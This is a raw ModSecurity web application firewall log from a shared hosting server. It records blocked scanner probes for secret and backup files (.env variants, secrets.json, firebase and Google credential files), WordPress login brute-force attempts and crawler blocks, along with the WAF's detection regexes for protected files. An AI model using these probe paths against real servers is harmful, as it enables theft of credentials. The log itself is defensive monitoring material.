[Tue May 26 19:03:12.935056 2026] [security2:error] [pid 1045635:tid 1045810] [client 142.248.80.164:14808] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahWhGBhDcQXYr7SS5sUjZQAAAC0"]
[Tue May 26 19:03:12.935062 2026] [security2:error] [pid 1045635:tid 1045766] [client 142.248.80.164:14786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahWhGBhDcQXYr7SS5sUjYgAAAAE"]
[Tue May 26 19:03:12.935945 2026] [security2:error] [pid 1045635:tid 1045840] [client 142.248.80.164:14846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahWhGBhDcQXYr7SS5sUjYwAAAEs"]
[Tue May 26 19:03:12.936488 2026] [security2:error] [pid 1045635:tid 1045855] [client 142.248.80.164:14778] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahWhGBhDcQXYr7SS5sUjZAAAAFo"]
[Tue May 26 19:03:13.023270 2026] [security2:error] [pid 1045635:tid 1045768] [client 142.248.80.164:14900] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahWhGRhDcQXYr7SS5sUjawAAAAM"]
[Tue May 26 19:03:13.023272 2026] [security2:error] [pid 1045635:tid 1045802] [client 142.248.80.164:14894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahWhGRhDcQXYr7SS5sUjagAAACU"]
[Tue May 26 19:03:13.024446 2026] [security2:error] [pid 1045635:tid 1045820] [client 142.248.80.164:14862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahWhGRhDcQXYr7SS5sUjbwAAADc"]
[Tue May 26 19:03:13.025002 2026] [security2:error] [pid 1045635:tid 1045802] [client 142.248.80.164:14844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahWhGRhDcQXYr7SS5sUjcQAAACU"]
[Tue May 26 19:03:13.026898 2026] [security2:error] [pid 1045635:tid 1045769] [client 142.248.80.164:14878] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahWhGRhDcQXYr7SS5sUjcAAAAAQ"]
[Tue May 26 19:03:13.027186 2026] [security2:error] [pid 1045635:tid 1045821] [client 142.248.80.164:14864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahWhGRhDcQXYr7SS5sUjbgAAADg"]
[Tue May 26 19:03:13.027285 2026] [security2:error] [pid 1045635:tid 1045808] [client 142.248.80.164:14820] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahWhGRhDcQXYr7SS5sUjbAAAACs"]
[Tue May 26 19:03:13.081613 2026] [security2:error] [pid 1045635:tid 1045881] [client 45.45.237.225:34250] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; YandexBot\\\\/3\\\\.0; \\\\+http:\\\\/\\\\/yandex\\\\.com\\\\/bots\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "3"] [id "901008"] [msg "Yandex Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/"] [unique_id "ahWhGRhDcQXYr7SS5sUjdgAAAHQ"]
[Tue May 26 19:03:13.116753 2026] [security2:error] [pid 1045635:tid 1045845] [client 142.248.80.164:14802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahWhGRhDcQXYr7SS5sUjewAAAFA"]
[Tue May 26 19:03:13.123586 2026] [security2:error] [pid 1045635:tid 1045863] [client 142.248.80.164:14838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahWhGRhDcQXYr7SS5sUjfQAAAGI"]
[Tue May 26 19:03:13.126859 2026] [security2:error] [pid 1045635:tid 1045891] [client 142.248.80.164:14774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahWhGRhDcQXYr7SS5sUjfwAAAH4"]
[Tue May 26 19:03:13.126874 2026] [security2:error] [pid 1045635:tid 1045839] [client 142.248.80.164:14770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahWhGRhDcQXYr7SS5sUjggAAAEo"]
[Tue May 26 19:03:13.126954 2026] [security2:error] [pid 1045635:tid 1045817] [client 142.248.80.164:14748] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahWhGRhDcQXYr7SS5sUjhAAAADQ"]
[Tue May 26 19:03:13.127148 2026] [security2:error] [pid 1045635:tid 1045772] [client 142.248.80.164:14734] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahWhGRhDcQXYr7SS5sUjgwAAAAc"]
[Tue May 26 19:03:13.127323 2026] [security2:error] [pid 1045635:tid 1045784] [client 142.248.80.164:14776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahWhGRhDcQXYr7SS5sUjfgAAABM"]
[Tue May 26 19:03:13.127864 2026] [security2:error] [pid 1045635:tid 1045818] [client 142.248.80.164:14758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.grandconclaveindia.org.in"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahWhGRhDcQXYr7SS5sUjgAAAADU"]
[Tue May 26 19:03:13.154511 2026] [security2:error] [pid 1045635:tid 1045868] [client 45.45.237.225:34250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "godrejpest.co.in"] [uri "/.env"] [unique_id "ahWhGRhDcQXYr7SS5sUjiAAAAGc"]
[Tue May 26 19:03:13.157231 2026] [security2:error] [pid 1045635:tid 1045834] [client 45.45.237.225:34252] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/api/config"] [unique_id "ahWhGRhDcQXYr7SS5sUjiQAAAEU"]
[Tue May 26 19:03:13.229458 2026] [security2:error] [pid 1045635:tid 1045824] [client 45.45.237.225:34252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "godrejpest.co.in"] [uri "/robots.txt"] [unique_id "ahWhGRhDcQXYr7SS5sUjjAAAADs"]
[Tue May 26 19:03:13.229579 2026] [security2:error] [pid 1045635:tid 1045824] [client 45.45.237.225:34252] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "godrejpest.co.in"] [uri "/robots.txt"] [unique_id "ahWhGRhDcQXYr7SS5sUjjAAAADs"]
[Tue May 26 19:03:13.303460 2026] [security2:error] [pid 1045635:tid 1045812] [client 45.45.237.225:34250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "godrejpest.co.in"] [uri "/.env.backup"] [unique_id "ahWhGRhDcQXYr7SS5sUjkQAAAC8"]
[Tue May 26 19:03:13.383094 2026] [security2:error] [pid 1045635:tid 1045875] [client 45.45.237.225:34362] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/.env.production"] [unique_id "ahWhGRhDcQXYr7SS5sUjlAAAAG4"]
[Tue May 26 19:03:13.383153 2026] [security2:error] [pid 1045635:tid 1045853] [client 45.45.237.225:34376] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/api/env"] [unique_id "ahWhGRhDcQXYr7SS5sUjkwAAAFg"]
[Tue May 26 19:03:13.384065 2026] [security2:error] [pid 1045635:tid 1045790] [client 45.45.237.225:34348] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/secrets.json"] [unique_id "ahWhGRhDcQXYr7SS5sUjlwAAABk"]
[Tue May 26 19:03:13.385355 2026] [security2:error] [pid 1045635:tid 1045798] [client 45.45.237.225:34402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "godrejpest.co.in"] [uri "/.env.bak"] [unique_id "ahWhGRhDcQXYr7SS5sUjpAAAACE"]
[Tue May 26 19:03:13.385422 2026] [security2:error] [pid 1045635:tid 1045798] [client 45.45.237.225:34402] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "godrejpest.co.in"] [uri "/.env.bak"] [unique_id "ahWhGRhDcQXYr7SS5sUjpAAAACE"]
[Tue May 26 19:03:13.385933 2026] [security2:error] [pid 1045635:tid 1045795] [client 45.45.237.225:34318] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/firebase-adminsdk.json"] [unique_id "ahWhGRhDcQXYr7SS5sUjmAAAAB4"]
[Tue May 26 19:03:13.386659 2026] [security2:error] [pid 1045635:tid 1045869] [client 45.45.237.225:34332] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; Baiduspider\\\\/2\\\\.0; \\\\+http:\\\\/\\\\/www\\\\.baidu\\\\.com\\\\/search\\\\/spider\\\\.html\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/othercrawler.conf"] [line "9"] [id "901012"] [msg "Baidu Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "godrejpest.co.in"] [uri "/google-credentials.json"] [unique_id "ahWhGRhDcQXYr7SS5sUjoAAAAGg"]
[Tue May 26 19:03:14.279641 2026] [security2:error] [pid 1045635:tid 1045832] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhGRhDcQXYr7SS5sUjswAAAEM"]
[Tue May 26 19:03:14.856209 2026] [security2:error] [pid 1045635:tid 1045668] [remote 54.36.102.244:38278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWhGhhDcQXYr7SS5sUj1QAAHSA"]
[Tue May 26 19:03:17.935934 2026] [security2:error] [pid 1045635:tid 1045829] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhHRhDcQXYr7SS5sUkKwAAAEA"]
[Tue May 26 19:03:19.614011 2026] [security2:error] [pid 1045635:tid 1045703] [remote 5.42.158.148:51218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWhHxhDcQXYr7SS5sUkZAAASEM"]
[Tue May 26 19:03:20.371403 2026] [security2:error] [pid 1045635:tid 1045708] [remote 212.224.100.2:18367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhIBhDcQXYr7SS5sUkggAACkg"]
[Tue May 26 19:03:20.482865 2026] [security2:error] [pid 1045635:tid 1045795] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhIBhDcQXYr7SS5sUkegAAAB4"]
[Tue May 26 19:03:21.211787 2026] [security2:error] [pid 1045635:tid 1045692] [remote 79.116.52.1:48626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.52.116.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhIRhDcQXYr7SS5sUklwAAETg"]
[Tue May 26 19:03:21.391271 2026] [security2:error] [pid 1045635:tid 1045686] [remote 5.42.158.148:51218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWhIRhDcQXYr7SS5sUkoQAAFzI"], referer: https://christinaspromotions.com/wp-login.php
[Tue May 26 19:03:21.995875 2026] [security2:error] [pid 1045635:tid 1045711] [remote 57.141.2.69:41347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWhIRhDcQXYr7SS5sUkswAAV0s"]
[Tue May 26 19:03:22.219258 2026] [security2:error] [pid 1045635:tid 1045783] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhIRhDcQXYr7SS5sUksQAAABI"]
[Tue May 26 19:03:24.474863 2026] [security2:error] [pid 1045635:tid 1045875] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhJBhDcQXYr7SS5sUk-wAAAG4"]
[Tue May 26 19:03:24.814559 2026] [security2:error] [pid 1045635:tid 1045688] [remote 194.163.139.224:49676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhJBhDcQXYr7SS5sUlDQAAZTQ"]
[Tue May 26 19:03:25.018181 2026] [security2:error] [pid 1045635:tid 1045706] [remote 45.79.189.31:47050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWhJBhDcQXYr7SS5sUlGQAAOUY"]
[Tue May 26 19:03:26.638741 2026] [security2:error] [pid 1045635:tid 1045800] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhJhhDcQXYr7SS5sUlOQAAACM"]
[Tue May 26 19:03:26.691581 2026] [security2:error] [pid 1045635:tid 1045801] [client 185.191.171.3:35682] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/day/2022-05-31/"] [unique_id "ahWhJhhDcQXYr7SS5sUlSgAAACQ"]
[Tue May 26 19:03:26.691744 2026] [security2:error] [pid 1045635:tid 1045801] [client 185.191.171.3:35682] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/day/2022-05-31/"] [unique_id "ahWhJhhDcQXYr7SS5sUlSgAAACQ"]
[Tue May 26 19:03:26.939871 2026] [security2:error] [pid 1045635:tid 1045687] [remote 194.163.139.224:49676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhJhhDcQXYr7SS5sUlTgAAPzM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:03:27.779423 2026] [security2:error] [pid 1045635:tid 1045771] [client 14.239.248.209:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhJxhDcQXYr7SS5sUlYgAAAAY"]
[Tue May 26 19:03:28.885480 2026] [security2:error] [pid 1045635:tid 1045774] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhKBhDcQXYr7SS5sUlgwAAAAk"]
